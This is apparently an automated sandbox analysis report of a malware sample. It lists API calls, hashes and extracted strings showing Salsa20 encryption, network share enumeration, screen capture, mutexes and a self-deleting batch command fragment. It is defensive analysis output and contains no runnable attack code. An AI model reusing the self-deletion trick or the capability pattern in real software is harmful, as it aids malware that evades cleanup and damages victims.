                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3074076210-0
                                                                                                                            • Opcode ID: eb1f6b33ac545915091b05cc8105b702484a62abd4cfa5c28d4d223aa6d879c5
                                                                                                                            • Instruction ID: 59c7372493d7f9b00a2451ede5c787d9a732f38d13ea5905c094d49918cd6226
                                                                                                                            • Opcode Fuzzy Hash: eb1f6b33ac545915091b05cc8105b702484a62abd4cfa5c28d4d223aa6d879c5
                                                                                                                            • Instruction Fuzzy Hash: 27F0F43154021DA6CF00BAA8EC52DEEB7EC9F01396F105966FD14B2181DBB19E4882D5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00E43B0A
                                                                                                                              • Part of subcall function 00E53B4C: _malloc.LIBCMT ref: 00E53B64
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                            • String ID: vector<T> too long
                                                                                                                            • API String ID: 657562460-3788999226
                                                                                                                            • Opcode ID: 25b31bc49c66ecf89490c4d4b9fff0a9716a8b32f9c5e61fe1d0036fca9e9fa0
                                                                                                                            • Instruction ID: 7272f5c7963254dce25993df1f52e0d269820a1000b860c5f85e09fb5199932b
                                                                                                                            • Opcode Fuzzy Hash: 25b31bc49c66ecf89490c4d4b9fff0a9716a8b32f9c5e61fe1d0036fca9e9fa0
                                                                                                                            • Instruction Fuzzy Hash: 1601F771200B05ABD720CFACD491756F7E8EF80728F20863EEA5597741EBB1E944C781
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00E84AE0: GetStdHandle.KERNEL32(000000F4,00E84C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00E8480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00E81D37,00000000,00E3CDAE,00000001,00000001), ref: 00E84AFA
                                                                                                                              • Part of subcall function 00E84AE0: GetFileType.KERNEL32(00000000), ref: 00E84B05
                                                                                                                              • Part of subcall function 00E84AE0: __vfwprintf_p.LIBCMT ref: 00E84B27
                                                                                                                            • _raise.LIBCMT ref: 00E84C18
                                                                                                                              • Part of subcall function 00E5A12E: __getptd_noexit.LIBCMT ref: 00E5A16B
                                                                                                                              • Part of subcall function 00E57CEC: _doexit.LIBCMT ref: 00E57CF6
                                                                                                                            Strings
                                                                                                                            • %s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 00E84C0C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandleType__getptd_noexit__vfwprintf_p_doexit_raise
                                                                                                                            • String ID: %s(%d): OpenSSL internal error, assertion failed: %s
                                                                                                                            • API String ID: 2149077303-4210838268
                                                                                                                            • Opcode ID: 3a90991a9869cdf30411c025bddb8456ae3c6a8031ddf8fd1000fb4d28da430f
                                                                                                                            • Instruction ID: 4baf330f1eb603fab98a7579614562921726cc31e1a1bee996bcbc7d19e8c292
                                                                                                                            • Opcode Fuzzy Hash: 3a90991a9869cdf30411c025bddb8456ae3c6a8031ddf8fd1000fb4d28da430f
                                                                                                                            • Instruction Fuzzy Hash: 66D05E79588200BFD9023790AC03A0A7B92EF88714F408864FA9E140A2D7728124B717
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2799698630-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00E55208: __getptd_noexit.LIBCMT ref: 00E55208
                                                                                                                            • __lock_file.LIBCMT ref: 00E53A7D
                                                                                                                              • Part of subcall function 00E50E53: __lock.LIBCMT ref: 00E50E76
                                                                                                                            • __fclose_nolock.LIBCMT ref: 00E53A88
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2800547568-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E418DD
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00E418E9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFreeHandleVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2443081362-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 00E4FA25
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00E40BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00E40C12
                                                                                                                            • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 00E4FDA4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumMessageOpenSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1835186980-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00E53B64
                                                                                                                              • Part of subcall function 00E50C62: __FF_MSGBANNER.LIBCMT ref: 00E50C79
                                                                                                                              • Part of subcall function 00E50C62: __NMSG_WRITE.LIBCMT ref: 00E50C80
                                                                                                                              • Part of subcall function 00E50C62: RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,00000000,00000000,?,00E58CF4,00000000,00000000,00000000,00000000,?,00E58BE1,00000018,00F37BD0), ref: 00E50CA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 501242067-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,00F59230), ref: 00E4FDD6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            • Opcode ID: 59407851ad32af5ce4c28964c2ea95c6edf84203bf8caee0abb29386338d6c11
                                                                                                                            • Instruction ID: f37df88381d85ae6ebebdac62fb4fd298fd1aec95f6332d9558858ddafb7c963
                                                                                                                            • Opcode Fuzzy Hash: 59407851ad32af5ce4c28964c2ea95c6edf84203bf8caee0abb29386338d6c11
                                                                                                                            • Instruction Fuzzy Hash: 29D0A931389309BBE7080BA5AC03F093A988B18B01F500029F704E80D0DAE1E020AA2D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __fsopen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3646066109-0
                                                                                                                            • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                            • Instruction ID: 2e825462fae3d752df75ccc5cf561ff01f6f4b510cfb3091e7c7c2cbffd065d8
                                                                                                                            • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                            • Instruction Fuzzy Hash: C9B0927254020C77CF012E82EC02B493B599B50760F048060FF0C28161E6B7E6689799
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __wfsopen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 197181222-0
                                                                                                                            • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                            • Instruction ID: 8612185b0ffc1f56a7abebf6e6035f41acccf67f68d88a018f77c47736a7afd4
                                                                                                                            • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                            • Instruction Fuzzy Hash: 0FB0927244020C77CE012A82EC02B593B599B416A0F008060FF0C281A1A673A6A49A89
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,?,?), ref: 00E42966
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 626452242-0
                                                                                                                            • Opcode ID: 2d615ade907281a0067a3c0799b975305ee17cfbb0b5fe4f63a61b5c27fb2457
                                                                                                                            • Instruction ID: cbdaea26d29d46fc61da1555658fa941946ff88c60fc86ba16c025db4db2b057
                                                                                                                            • Opcode Fuzzy Hash: 2d615ade907281a0067a3c0799b975305ee17cfbb0b5fe4f63a61b5c27fb2457
                                                                                                                            • Instruction Fuzzy Hash: 3211EE71900219EBDB00DF59DC41BEFBBA8EF05314F104129FA28B7280D77A9A15CBD2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _wcscmp.LIBCMT ref: 00E682B9
                                                                                                                            • _wcscmp.LIBCMT ref: 00E682CA
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00E68568,?,00000000), ref: 00E682E6
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00E68568,?,00000000), ref: 00E68310
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale_wcscmp
                                                                                                                            • String ID: ACP$OCP
                                                                                                                            • API String ID: 1351282208-711371036
                                                                                                                            • Opcode ID: 4ea700f374b93445f20cb757a19e476caeb299bdbea6fddd2265d6850b03a0c4
                                                                                                                            • Instruction ID: 049b24c693071c91492d36f4b8831aa509c742d3f71609de17e2816124919830
                                                                                                                            • Opcode Fuzzy Hash: 4ea700f374b93445f20cb757a19e476caeb299bdbea6fddd2265d6850b03a0c4
                                                                                                                            • Instruction Fuzzy Hash: AD01C4312C1505AAD7105E58ED09FD637D8AB05BD4F10A011F604FA4A0EF70DE40C795
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 00E3C090
                                                                                                                            • input != nullptr && output != nullptr, xrefs: 00E3C095
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __wassert
                                                                                                                            • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                            • API String ID: 3993402318-1975116136
                                                                                                                            • Opcode ID: d1e30c5521de9760335f24bbf4c5b2c92e141fb939e0c6140d30f465ebb01cf5
                                                                                                                            • Instruction ID: dc86a8dc2204bc4668e28d0b0c9d2c1b0ec390f0adf4828f0e46c2d7da417531
                                                                                                                            • Opcode Fuzzy Hash: d1e30c5521de9760335f24bbf4c5b2c92e141fb939e0c6140d30f465ebb01cf5
                                                                                                                            • Instruction Fuzzy Hash: A7C19D75E002499FCB54CFA9C885ADEBBF1FF48304F24856AD919F7201E334AA458B54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00E424FE
                                                                                                                            • GetLastError.KERNEL32 ref: 00E42509
                                                                                                                            • CloseHandle.KERNEL32 ref: 00E4251C
                                                                                                                            • CloseHandle.KERNEL32 ref: 00E42539
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00E42550
                                                                                                                            • GetLastError.KERNEL32 ref: 00E4255B
                                                                                                                            • CloseHandle.KERNEL32 ref: 00E4256E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                            • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                            • API String ID: 2372642624-488272950
                                                                                                                            • Opcode ID: 46593d56e25eef4b980653addae411daf502114b8dab217239a6aae78d416306
                                                                                                                            • Instruction ID: 4fa2f7b2038efd13ba8efe08c2d9feefee39323f08d48b5009b75669630e0ab4
                                                                                                                            • Opcode Fuzzy Hash: 46593d56e25eef4b980653addae411daf502114b8dab217239a6aae78d416306
                                                                                                                            • Instruction Fuzzy Hash: BA714D7294021CABDB10DBA1ED89FEA77BCFB84315F600596F609E2090DF759A48CF61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 00E41915
                                                                                                                            • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00E41932
                                                                                                                            • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00E41941
                                                                                                                            • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00E41948
                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00E41956
                                                                                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00E41962
                                                                                                                            • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00E41974
                                                                                                                            • lstrcatW.KERNEL32(00000000,?), ref: 00E4198B
                                                                                                                            • lstrcatW.KERNEL32(00000000,00F30260), ref: 00E41993
                                                                                                                            • lstrcatW.KERNEL32(00000000,?), ref: 00E41999
                                                                                                                            • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00E419A3
                                                                                                                            • _memset.LIBCMT ref: 00E419B8
                                                                                                                            • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 00E419DC
                                                                                                                              • Part of subcall function 00E42BA0: lstrlenW.KERNEL32(?), ref: 00E42BC9
                                                                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00E41A01
                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00E41A04
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                            • String ID: failed with error
                                                                                                                            • API String ID: 4182478520-946485432
                                                                                                                            • Opcode ID: 7d0f7bb944fa13666e428373e3ae4f31506bd6b0a97be6b8391db4d557b06101
                                                                                                                            • Instruction ID: 831de35539b5e608bb56acacdb7bf65bee8ecbd2f9e729d96992f73ffaecf736
                                                                                                                            • Opcode Fuzzy Hash: 7d0f7bb944fa13666e428373e3ae4f31506bd6b0a97be6b8391db4d557b06101
                                                                                                                            • Instruction Fuzzy Hash: 3B21E131A40218BBEB116BA19C4AFBE3A78EBC5B11F300055FB05B2290DE746D49DBE5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00E849A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00E84B72), ref: 00E849C7
                                                                                                                              • Part of subcall function 00E849A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00E849D7
                                                                                                                              • Part of subcall function 00E849A0: GetDesktopWindow.USER32 ref: 00E849FB
                                                                                                                              • Part of subcall function 00E849A0: GetProcessWindowStation.USER32(?,00E84B72), ref: 00E84A01
                                                                                                                              • Part of subcall function 00E849A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00E84B72), ref: 00E84A1C
                                                                                                                              • Part of subcall function 00E849A0: GetLastError.KERNEL32(?,00E84B72), ref: 00E84A2A
                                                                                                                              • Part of subcall function 00E849A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00E84B72), ref: 00E84A65
                                                                                                                              • Part of subcall function 00E849A0: _wcsstr.LIBCMT ref: 00E84A8A
                                                                                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EB2316
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00EB2323
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00EB2338
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00EB2341
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 00EB234E
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00EB235C
                                                                                                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 00EB236E
                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 00EB23CA
                                                                                                                            • GetBitmapBits.GDI32(?,?,00000000), ref: 00EB23D6
                                                                                                                            • SelectObject.GDI32(?,?), ref: 00EB2436
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00EB243D
                                                                                                                            • DeleteDC.GDI32(?), ref: 00EB244A
                                                                                                                            • DeleteDC.GDI32(?), ref: 00EB2450
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                            • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                            • API String ID: 151064509-1805842116
                                                                                                                            • Opcode ID: 36270c2661cb222132942eaa2951ed1fa5e6a0935101094f358d23dcaa09d9c4
                                                                                                                            • Instruction ID: f6a4674411825a10cd2abcaa3c296a1b95b372f55c97ab458a6541dc6ab5d01c
                                                                                                                            • Opcode Fuzzy Hash: 36270c2661cb222132942eaa2951ed1fa5e6a0935101094f358d23dcaa09d9c4
                                                                                                                            • Instruction Fuzzy Hash: B4417471544304EFD3205B759D46F6FBBF8EF89710F200919FA54A62E1EBB19805CBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                            • API String ID: 909875538-2733969777
                                                                                                                            • Opcode ID: 45f34756941971bbd8e745e11b4b2ba9351c5f9d655e2321a9c0441fd577665a
                                                                                                                            • Instruction ID: 11e4f687b2a26af8d77cb5172cd3324d1a73d9a1ff6dfafda80a1b7e61ab7e4a
                                                                                                                            • Opcode Fuzzy Hash: 45f34756941971bbd8e745e11b4b2ba9351c5f9d655e2321a9c0441fd577665a
                                                                                                                            • Instruction Fuzzy Hash: C3F1D7B16483416BEB21EA74DC42F9BB7D89F54708F041829F98CF7283E6B4DA458793
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                             • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1503006713-0
